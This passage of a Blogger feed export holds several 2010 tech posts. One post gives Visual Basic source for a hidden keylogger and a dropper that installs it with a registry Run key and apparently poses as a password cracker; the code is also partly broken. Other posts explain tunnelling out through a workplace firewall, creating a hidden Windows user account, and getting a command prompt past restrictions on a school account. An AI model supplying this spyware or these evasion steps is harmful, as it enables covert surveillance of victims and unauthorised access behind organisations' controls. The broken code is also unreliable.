/&gt;&lt;br /&gt;ssh -l username -nNT -R 1100:172.16.42.80:22 12.24.79.186&lt;br /&gt;&lt;br /&gt;That's it. Just replace each of the red highlighted items with the appropriate local numbers and you're all set. Now, before I leave you totally confused as to what each of these do, let me break this down so you understand it better.&lt;br /&gt;&lt;br /&gt;Username - Obviously this is your non-root user at home. So if you login to your BSD or Linux box with the username "bobwhite", you'd replace "username" above with "bobwhite".&lt;br /&gt;&lt;br /&gt;1100: - This will be the local port on your home computer you will connect to. I'll explain more how to use this later. But you'll want to make sure it's a port other than what you have SSH listening on. SSH normally listens on port 22, but if you've moved it to say, port 300, then you won't want this port ID to be 300. 1100 is a pretty good number so you can be sure not to step on the toes of any other services running.&lt;br /&gt;&lt;br /&gt;172.16.42.80:22 - This is the ip address and local port on your work computer. So if your work computer has the IP address of 172.16.42.80, then you'd enter that there. Or for example, if your IP was 10.0.23.56, you'd use that instead. Now as a side note, you can use your work computer as a middleman for connecting to another machine inside the firewall rather than your own. By changing the IP and port number to the one used by the machine of choice you'd rather connect to, you will be able to ssh into that other machine from home without first having to stop at your own machine. The kicker is, if you want to get into your machine later on, you'll either need to restart the ssh session on your work computer, or ssh back to it from the machine you got forwarded to.&lt;br /&gt;&lt;br /&gt;12.24.79.186 - This will be the IP address of your workstation or server at home you're connecting into.&lt;br /&gt;&lt;br /&gt;Well, that's pretty much it. There are two additional commands you'll need to use if you're, A) connecting to your machine at home through a port other than 22, and/or B) if you're using an SSH static public/private key. To do either of these, you'll need to add the following options to your ssh command line:&lt;br /&gt;&lt;br /&gt;-p 300 - The "-p" tells SSH that you want to specify a port. 300 is of course an example of whatever your home ssh server listens on.&lt;br /&gt;&lt;br /&gt;-i id_dsa - The "-i" command tells SSH that you want to use an "identity" file (aka a public/private keypair) to connect to the remote server rather than an automatically generated one. This is important if you've setup your sshd_config file similar to the configuration shown here.&lt;br /&gt;&lt;br /&gt;Once the connection is established from your work computer, you should be able to connect from home anytime you want. Just remember two things. The first is to consider using AutoSSH to keep the connection alive in case it should drop, and the second is that you've technically just opened a hole through the firewall and into your network for the world to exploit. Now the likelihood of someone exploiting it is very slim to none, but there's still that chance, so don't get all whilly nilly with it when you use it. Only use it on nights when you expect to have a need to connect to your machine and shut it off during the day while you're at work.&lt;br /&gt;&lt;br /&gt;Also, another note of interest. When you start the session, you'll need to do one of three things. Leave the console window open with the session running, do the command and follow it with an &amp; sign to allow the process to become separated from the console so that it can allow you to do other things while it's running (you'll still need to keep the console window open when you're done or it'll kill the session), or start a screen session and start this process in there and then detach the screen session to leave it running.&lt;br /&gt;&lt;br /&gt;And one other thing, when the command starts, you won't get any feedback that it's running. At most you'll be asked for your passkey for your public key file, or your login credentials. After that it will act like a hung process that's not doing anything, but actually it's fine. To test your tunnel, just open a second console window and ssh to your home computer. Once in, ssh to localhost and port 1100 (or whatever port you chose) and login to your work computer. If you did it right, you should now find yourself ssh'ed into your work PC.&lt;br /&gt;&lt;br /&gt;From home all you'll need to do is ssh either to localhost (if you're on the same machine your work PC is ssh'ed into) or the IP of the machine you connected to from work on the IP you specified and you will be able to login to your machine at work. It's just that simple. You're essentially riding an existing ssh session backwards to your computer at work.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-1412182058111539216?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/1412182058111539216/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/howto-create-reverse-ssh-tunnel.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1412182058111539216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1412182058111539216'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/howto-create-reverse-ssh-tunnel.html' title='HowTo: Create a Reverse SSH Tunnel'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-2699164032437082558</id><published>2010-02-11T12:36:00.000-08:00</published><updated>2010-02-11T12:45:04.585-08:00</updated><title type='text'>Show apps that use internet connection at the moment</title><content type='html'>1. $ lsof -P -i -n | cut -f 1 -d " "| uniq | tail -n +2&lt;br /&gt;2. $ slof -P -i -n&lt;br /&gt;3. $ ss -p&lt;br /&gt;  a. ss -p | cat&lt;br /&gt;  b. ss -p | grep STA&lt;br /&gt;  c. ss -p | cut -f2 -sd\"&lt;br /&gt;  d. ss -p | grep STA | cut -f2 -d\"&lt;br /&gt;4. $ netstat -lantp | grep -i stab | awk -F/ '{print $2}' | sort | uniq&lt;br /&gt;5. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | sort | uniq&lt;br /&gt;6. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | uniq | sort&lt;br /&gt;&lt;br /&gt;Food for thought.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-2699164032437082558?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/2699164032437082558/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/show-apps-that-use-internet-connection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2699164032437082558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2699164032437082558'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/show-apps-that-use-internet-connection.html' title='Show apps that use internet connection at the moment'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-1629108197881585850</id><published>2010-02-11T12:23:00.000-08:00</published><updated>2010-02-11T12:24:29.546-08:00</updated><title type='text'>How to install, configure and work a LAMP stack with FTP access</title><content type='html'>How to set up your LAMP stack.&lt;br /&gt;&lt;br /&gt;First off I will talk about what exactly a LAMP stack is.&lt;br /&gt;&lt;br /&gt;LAMP stands for Linux Apache MySQL PHP (this can sometimes be replaced with Python). Lets break this down.&lt;br /&gt;&lt;br /&gt;Linux- Linux/ Unix is the leading OS for web servers due to low resource usage allowing for faster load times and high up-time.&lt;br /&gt;&lt;br /&gt;Apache- Apache is the actual service that Hosts the website and turns your box into a usable webhost.&lt;br /&gt;&lt;br /&gt;MySQL- is a dynamic database that is able to hold almost any information. This stores information that is then pulled by PHP or another server side language.&lt;br /&gt;&lt;br /&gt;PHP- A high powered dynamic internet language derived from the GPL (General Programing Language) Perl. This is used to display dynamic content.&lt;br /&gt;&lt;br /&gt;Now that we have a brief understanding of what exactly we are doing we will now be able to begin.&lt;br /&gt;&lt;br /&gt;Before I get started as to how to do everything I would like to mention I am running Ubuntu Server Edition 7.04 (32 bit). I am also assuming you have basic understanding of Linux/ Unix along with general computing knowledge.&lt;br /&gt;&lt;br /&gt;Once logged on to our Linux box we will need to download and install our Apache server, surprisingly enough it is incredibly simple. Just type:&lt;br /&gt;&lt;br /&gt;sudo apt-get install apache2 mysql-server php5 libapache2-mod-php5 php5-xsl php5-gd php-pear libapache2-mod-auth-mysql php5-mysql&lt;br /&gt;&lt;br /&gt;This will take a few moments to install and download.&lt;br /&gt;&lt;br /&gt;Once that is up and working we will restart the LAMP server by using:&lt;br /&gt;&lt;br /&gt;sudo /etc/init.d/apache2 restart&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now lets make it work! We will configure Apache by using a simple Linux based text editor called nano. (I am using nano in this tutorial instead of vi for the simplicity of nano to a beginner). Unlike so many other services you do not need to directly configure your apache config. And before we move on we will need to make a new directory so type in the following:&lt;br /&gt;&lt;br /&gt;sudo mkdir /home/[username here]/www/&lt;br /&gt;sudo chmod 755 /home/[username here]/www/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;With that made lets do some small bits of configuring. We will use our nano editor to edit our sites available list by running the following:&lt;br /&gt;&lt;br /&gt;sudo cp /etc/apache2/sites-available/default / etc/apache2/sites-available/mysite&lt;br /&gt;sudo nano etc/apache2/sites-available/mysite&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;That bit there copies the file “default” and renames it “mysite” and the second line opens it for editing. Here is what we need to change:&lt;br /&gt;&lt;br /&gt;Change this:&lt;br /&gt;&lt;br /&gt;DocumentRoot /var/www&lt;br /&gt;&lt;Directory /&gt;&lt;br /&gt;Options FollowSymLinks&lt;br /&gt;AllowOverride None&lt;br /&gt;&lt;/Directory&gt;&lt;br /&gt;&lt;Directory /var/www/&gt;&lt;br /&gt;&lt;br /&gt;To:&lt;br /&gt;&lt;br /&gt;DocumentRoot /home/[username here]/www&lt;br /&gt;&lt;Directory /&gt;&lt;br /&gt;Options FollowSymLinks&lt;br /&gt;AllowOverride None&lt;br /&gt;&lt;/Directory&gt;&lt;br /&gt;&lt;Directory /home/[username here]/www&gt;&lt;br /&gt;&lt;br /&gt;Now hit ctrl + O to save. Then ctrl + Z to close the file.&lt;br /&gt;&lt;br /&gt;Next we use a pretty little Linux trick that deactivates the “default” site with “mysite”&lt;br /&gt;&lt;br /&gt;sudo a2dissite default &amp;&amp; sudo a2ensite mysite&lt;br /&gt;&lt;br /&gt;And finally you will need to restart your Apache server just as we did before.&lt;br /&gt;&lt;br /&gt;SO! Lets test it out! We will need to give our new web server something to display so lets keep it simple with the following script:&lt;br /&gt;&lt;br /&gt;echo '&lt;b&gt;Hello! It is working!&lt;/b&gt;' &gt; /home/[username here]/www/index.html&lt;br /&gt;&lt;br /&gt;Done that? GREAT!&lt;br /&gt;&lt;br /&gt;Now lets take a look open up a web browser and type in the internal address of that machine (if you are testing this on the same machine it is installed on the universal internal IP for localhost is 127.0.0.1)&lt;br /&gt;So as a URL you would type http://address-of-machine As an example mine was http://192.168.1.67&lt;br /&gt;If it works you should see the message “Hello! It is working!”&lt;br /&gt;&lt;br /&gt;Lets advance a little bit though. This is all fine and dandy if you are on a LAN with this machine, but what about over the World Wide Web? Well this is automatically listening on port 80, unfortunately most ISPs HATE people using this port so I will show you how to change the listen port of the server. Simple use nano to change the apache port list.&lt;br /&gt;&lt;br /&gt;sudo nano /etc/apache2/ports.conf&lt;br /&gt;&lt;br /&gt;It will by default say&lt;br /&gt;&lt;br /&gt;Listen 80&lt;br /&gt;&lt;br /&gt;&lt;IfModule mod_ssl.c&gt;&lt;br /&gt;Listen 443&lt;br /&gt;&lt;/IfModule&gt;&lt;br /&gt;&lt;br /&gt;change this to:&lt;br /&gt;&lt;br /&gt;Listen 8000&lt;br /&gt;&lt;br /&gt;&lt;IfModule mod_ssl.c&gt;&lt;br /&gt;Listen 443&lt;br /&gt;&lt;/IfModule&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Perfect! Now after you restart the Apache service once more we will be listening on a unrestricted port! The only thing that has changed is the way we access the webpage. Instead of typing http://192.168.1.67 we now type http://192.168.1.67:8000&lt;br /&gt;Log into your router forward port 8000 to the internal address of the LAMP stack and we are good to go.&lt;br /&gt;&lt;br /&gt;You now have a fully functional LAMP stack that will host anything just as a paid host will (it won’t have a domain name as you need to set that up which will not be covered in this tutorial)&lt;br /&gt;&lt;br /&gt;To make this a little more complete I am going to go one step further and show you how to gain FTP access to your new LAMP stack!&lt;br /&gt;&lt;br /&gt;We will now download a service called proftpd. Do this by typing:&lt;br /&gt;&lt;br /&gt;sudo apt-get install proftpd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Simple enough, just as a side note I recommend installing it as a standalone. Now to our lovely friend NANO and do some configuring!&lt;br /&gt;Find the line that defines the following:&lt;br /&gt;&lt;br /&gt;# Use this to jail all users in their homes&lt;br /&gt;#DefaultRoot ~&lt;br /&gt;&lt;br /&gt;and change it to:&lt;br /&gt;&lt;br /&gt;# Use this to jail all users in their homes&lt;br /&gt;DefaultRoot /home/[username here]/www&lt;br /&gt;&lt;br /&gt;Just note exactly what we did. We changed it so that anyone who logs into the FTP will only have FTP access over the web server files AND we had to uncomment (remove the ‘#’).&lt;br /&gt;Before I forget I want to say we edit the FTP config with the following:&lt;br /&gt;&lt;br /&gt;sudo nano /etc/proftpd/proftpd.conf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Also note that most ISPs block port 21 (FTP port) so we will change that as well.&lt;br /&gt;&lt;br /&gt;So find the line:&lt;br /&gt;&lt;br /&gt;# Port 21 is the standard FTP port.&lt;br /&gt;Port 21&lt;br /&gt;&lt;br /&gt;And change it to:&lt;br /&gt;&lt;br /&gt;# Port 21 is the standard FTP port.&lt;br /&gt;Port 2121&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now forward the port 2121 to your LAMP stack as well. Following that we will restart the FTP service by typing:&lt;br /&gt;&lt;br /&gt;sudo /etc/init.d/proftpd restart&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;LETS TRY CONNECTING!&lt;br /&gt;Open FTP and connect to the address of you LAMP stack on port 2121&lt;br /&gt;So for example on MS command based FTP it would be:&lt;br /&gt;&lt;br /&gt;open 192.168.1.68 2121&lt;br /&gt;&lt;br /&gt;and log in using the credentials to your Linux box.&lt;br /&gt;&lt;br /&gt;TA DA! Now you have a working webhost with full FTP access!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-1629108197881585850?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/1629108197881585850/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-install-configure-and-work-lamp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1629108197881585850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/1629108197881585850'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-install-configure-and-work-lamp.html' title='How to install, configure and work a LAMP stack with FTP access'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-2933979734259138519</id><published>2010-02-11T12:19:00.001-08:00</published><updated>2010-02-11T12:19:48.782-08:00</updated><title type='text'>Creating a simple key logger</title><content type='html'>Creating a simple key logger&lt;br /&gt;By Dat Hacker&lt;br /&gt;VB Required&lt;br /&gt;First of all you need to make a extractor for your virus name it simple keylogger extractor:&lt;br /&gt;Now create a keylogger, make it have 0% opacity and create a textbox named textbox1 and a timer named timer1, set the timer to an interval of 1 and enable it, now add this coding:&lt;br /&gt;Public Class Form1&lt;br /&gt;Dim result As Integer&lt;br /&gt;Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer&lt;br /&gt;Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick&lt;br /&gt;For i = 1 To 255&lt;br /&gt;result = 0&lt;br /&gt;result = GetAsyncKeyState(i)&lt;br /&gt;If result = -32767 Then&lt;br /&gt;TextBox1.Text = Chr(i)&lt;br /&gt;End If&lt;br /&gt;Next i&lt;br /&gt;Dim filetxt, getname, path, filesys&lt;br /&gt;path = filesys.GetPathName("C:\windows\system32\log.log")&lt;br /&gt;getname = filesys.GetFileName(path)&lt;br /&gt;filetxt.WriteLine(TextBox1.Text)&lt;br /&gt;filetxt.Close()&lt;br /&gt;TextBox1.Text = ""&lt;br /&gt;End Sub&lt;br /&gt;End Class&lt;br /&gt;There will be “Warnings” ignore them as they will not interfere, now save this, compile it and go to the debug area (c:\users(or documents and settings)\username\documents \Visual Studio 2008\Projects\simple keylogger\simple keylogger\bin\Debug&lt;br /&gt;Here you will find an exe that will be the program, rename it sys.txt and copy it to your desktop, now open simple keylogger extractor, create 2 textboxes leave the names as textbox1 and textbox2, and make them multiline. Make the opacity 0% and and copy this text to the file:&lt;br /&gt;Public Class Form1&lt;br /&gt;Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load&lt;br /&gt;Shell = CreateObject("wscript.shell")&lt;br /&gt;shell.run("c:\windows\system32\reg.reg")&lt;br /&gt;shell = Nothing&lt;br /&gt;shell = CreateObject("wscript.shell")&lt;br /&gt;shell.run("c:\windows\system32\sys.exe")&lt;br /&gt;shell = Nothing&lt;br /&gt;Dim filetxt, getname, path, filesys&lt;br /&gt;path = filesys.GetPathName("C:\windows\system32\reg.reg")&lt;br /&gt;getname = filesys.GetFileName(path)&lt;br /&gt;filetxt.WriteLine(TextBox1.Text)&lt;br /&gt;filetxt.Close()&lt;br /&gt;path = filesys.GetPathName("C:\windows\system32\sys.exe")&lt;br /&gt;getname = filesys.GetFileName(path)&lt;br /&gt;filetxt.WriteLine(TextBox2.Text)&lt;br /&gt;filetxt.Close()&lt;br /&gt;Dim shell&lt;br /&gt;Me.Close()&lt;br /&gt;My.Computer.FileSystem.DeleteFile("passwordcracker.exe")&lt;br /&gt;My.Computer.FileSystem.DeleteFile("c:\windows\system32\reg.reg")&lt;br /&gt;End Sub&lt;br /&gt;End Class&lt;br /&gt;Now set the textboxes, textbox1 should have the text:&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]&lt;br /&gt;"sys"="c:\\windows\\system32\\sys.exe"&lt;br /&gt;And textbox2 should have the text you generated from your keylogger (just copy the text)&lt;br /&gt;The program should run successfully, feel free to change scripting around&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-2933979734259138519?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/2933979734259138519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/creating-simple-key-logger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2933979734259138519'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/2933979734259138519'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/creating-simple-key-logger.html' title='Creating a simple key logger'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-7022456739325936681</id><published>2010-02-11T12:16:00.001-08:00</published><updated>2010-02-11T12:16:15.925-08:00</updated><title type='text'>How to make a hidden user account</title><content type='html'>Want an account that no one can see??? on windows XP **&lt;br /&gt;&lt;br /&gt;goto start&gt;run&gt;type regedit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;in the menu goto&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurren tVersion&lt;br /&gt;WinlogonSpecialAccountsUserList&lt;br /&gt;&lt;br /&gt;right click and select string value&lt;br /&gt;&lt;br /&gt;right click on the new string value and click rename&lt;br /&gt;&lt;br /&gt;type the name of the account you want to hide (exactly the way it is spelled)&lt;br /&gt;&lt;br /&gt;hit enter then right click on the string value again and click value change value to zero which hides it 1 shows it&lt;br /&gt;&lt;br /&gt;now exit the registry and logoff&lt;br /&gt;&lt;br /&gt;goto welcome screen and hit ctrl+alt+del twice to bring up old logon prompt&lt;br /&gt;&lt;br /&gt;type hidden accounts name and password.&lt;br /&gt;&lt;br /&gt;also hide all of the hidden accounts files.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7022456739325936681?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7022456739325936681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-make-hidden-user-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7022456739325936681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7022456739325936681'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-make-hidden-user-account.html' title='How to make a hidden user account'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-5689887720929086924</id><published>2010-02-11T12:15:00.003-08:00</published><updated>2010-02-11T12:15:42.558-08:00</updated><title type='text'>Locking and Hiding Hard-Drives</title><content type='html'>Here is an easy manual tutorial on how to lock and hide hard-drives.&lt;br /&gt;Follow these steps below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. open Registry (go to run command, type "regedit" and press enter)&lt;br /&gt;&lt;br /&gt;2. then go to this key&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer&lt;br /&gt;&lt;br /&gt;3. now click right button and create DWORD Value (blue color)&lt;br /&gt;&lt;br /&gt;4. Rename it as "NoViewOnDrive" (for locking drive)&lt;br /&gt;or&lt;br /&gt;Rename it as "NoDrives" (for Hiding drive)&lt;br /&gt;&lt;br /&gt;5. double click it and put some numbers to lock ur desired Drive and click ok.&lt;br /&gt;&lt;br /&gt;6. Here is Drive No.&lt;br /&gt;A: 1&lt;br /&gt;C: 4&lt;br /&gt;D: 8&lt;br /&gt;E: 16&lt;br /&gt;F: 32&lt;br /&gt;G: 64&lt;br /&gt;H: 128&lt;br /&gt;&lt;br /&gt;7. finally restart or log-off the computer to take effect.&lt;br /&gt;&lt;br /&gt;Keep in mind that "0" is Default Value or Disable or remove this setting.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-5689887720929086924?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/5689887720929086924/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/locking-and-hiding-hard-drives.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5689887720929086924'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/5689887720929086924'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/locking-and-hiding-hard-drives.html' title='Locking and Hiding Hard-Drives'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-3940207125789387903</id><published>2010-02-11T12:15:00.001-08:00</published><updated>2010-02-11T12:15:12.193-08:00</updated><title type='text'>Batch Files</title><content type='html'>Hi....well, i decided to try and do my first tutorial on how you can use batch files to your full extent...&lt;br /&gt;&lt;br /&gt;....Technically, DOS provides just eight basic batch file commands -- CALL, ECHO, FOR, GOTO, IF, PAUSE, REM, and SHIFT -- plus a tiny assortment of miscellaneous doodads: replaceable parameters, environment variables, labels, double == signs, and @ signs. That's it! Not too much to learn, even for the most fervent DOS-hater. But the tools these few commands can create will astonish you.....&lt;br /&gt;&lt;br /&gt;PC Computing - DOS Power Tools by Paul Somerson&lt;br /&gt;&lt;br /&gt;Batch files can be used for a large amout of different things, anything from gettting specific commands to start at specific times, to opening cmd in a limited account, to getting a first easy taste to the magic of programming, to just have the thrill of being to write in it!&lt;br /&gt;&lt;br /&gt;Batch files are made from the basic notepad (WIN + R, then type in notepad).&lt;br /&gt;Inside notepad the fun can begin.&lt;br /&gt;&lt;br /&gt;BASIC BATCH FILES&lt;br /&gt;&lt;br /&gt;To start with, we'lll make a simple .bat file to say "Hello World" and then pause.&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Hello World!&lt;br /&gt;echo.&lt;br /&gt;pause ::&lt;br /&gt;exit&lt;br /&gt;rem I love undergroundsystems.org!&lt;br /&gt;&lt;br /&gt;Ok, now to have fun and disect it :P&lt;br /&gt;&lt;br /&gt;To start with there's the @echo off. The @ means that the "echo off" part of the code isnt run visibly to the user. The "echo off" is also a secret spy tool! When this is put in, the user can still run the program, but with the flipping&lt;br /&gt;"C:\documents and settings\my documents\" or however your logged on.&lt;br /&gt;&lt;br /&gt;The echo is like the "COUT" comman in C. It sends whatever you write after it to the screen of your bat file. When you wrote "echo Hello World!", it sends to the screen "Hello World!", ommitting the echo. The "echo." is a nifty command to make writing in a batch file a lot easier. It basically just leaves a blank line, which i can tell you is a hell'ov a lot easier to see, than say:&lt;br /&gt;&lt;br /&gt;Hello World&lt;br /&gt;Press any key to continue...&lt;br /&gt;&lt;br /&gt;:eek: :eek: :eek:&lt;br /&gt;&lt;br /&gt;Next there is the "pause ::". Now I dont think there is any difference if you write "pause" or "pause ::". In any case, they both do the same visible thing. :rolleyes: when you type this into your batch file, it will say when you run the program:&lt;br /&gt;&lt;br /&gt;"Press any key to continue" Gosh not a please! :mad:&lt;br /&gt;&lt;br /&gt;As soon as you click any key, the program will continue to the next line of the code. which in our case is the "exit" command. This does what any jack-a$$ might think it does....exits or shutsdown the program. Nothing spectacular lol.&lt;br /&gt;&lt;br /&gt;Finally in our little program, there is the "rem I love US.org!". Now if you added this into your program when you ran it, you might have/or might not have been a bit puzzled to see that it didnt pop up. WTF This is because its just for you to write your notes after it...maybe not for a program like "Hello World", but something much longer and harder to script.&lt;br /&gt;&lt;br /&gt;Phew, that was a hell of a lot for 5 lines of programming! (goes off to get a cup'a'tea.)&lt;br /&gt;&lt;br /&gt;GETTING CMD WITH BATCH FILES&lt;br /&gt;&lt;br /&gt;Many people use batch files to get good'old cmd, in say a limited user. First can I say that im not encouraging anyone to try and do this, errr, its for administrators to test their security?....what is it :rolleyes: ....erm for security testing purposes only?....oh well, this isnt top secret super hacker stuff...&lt;br /&gt;&lt;br /&gt;Most cmd commands can be run from a batch file, and cmd can also be run from a batch file..Here is a little script i just made (sorry for any mistakes), which will try and open cmd with a variety of methods:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;pause&lt;br /&gt;cmd.exe&lt;br /&gt;pause&lt;br /&gt;command.com&lt;br /&gt;pause&lt;br /&gt;cmd&lt;br /&gt;pause&lt;br /&gt;c:\WINDOWS\system32\cmd.exe&lt;br /&gt;pause&lt;br /&gt;rem ############echo please modify this accordingly############&lt;br /&gt;COPY "c:\WINDOWS\system32\cmd.exe" "c\documents and settings\##please enter your username here##\my documents"&lt;br /&gt;pause&lt;br /&gt;exit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now, this code simply just goes through different ways to open up cmd.. The first 5 ways will always work..unless your admin :P (yer, i know you'll try this in schools), blocks them. If your admin is like the BOFH: (http://www.google.co.uk/search?hl=en&amp;q=bofh&amp;meta=) he might even have banned batch files, but oh well.... they did for me.. :madman:&lt;br /&gt;&lt;br /&gt;Final section now..&lt;br /&gt;&lt;br /&gt;RUNNING EASIER SCRIPTS!&lt;br /&gt;&lt;br /&gt;Now batch files can also be used to make nice simple scripts that help tha tards out there. :tard:&lt;br /&gt;&lt;br /&gt;Here is one which basically helps you make a new user on your non-networked computer.&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;:A&lt;br /&gt;cls&lt;br /&gt;echo Poetic-Justics's user creation program.&lt;br /&gt;echo.&lt;br /&gt;&lt;br /&gt;set /p n="Old User-name: "&lt;br /&gt;echo.&lt;br /&gt;set /p m="New user-name: "&lt;br /&gt;echo.&lt;br /&gt;set /p p="New user-name password: "&lt;br /&gt;echo.&lt;br /&gt;set /p g="new user-group: "&lt;br /&gt;echo.&lt;br /&gt;set /p s="Are you sure you want to do this? "&lt;br /&gt;if %s%==yes goto B&lt;br /&gt;if %s%==no goto c&lt;br /&gt;&lt;br /&gt;:B&lt;br /&gt;cls&lt;br /&gt;net user %m% %p% /ADD&lt;br /&gt;net user %n% /DELETE&lt;br /&gt;net group %g% %m% /ADD&lt;br /&gt;&lt;br 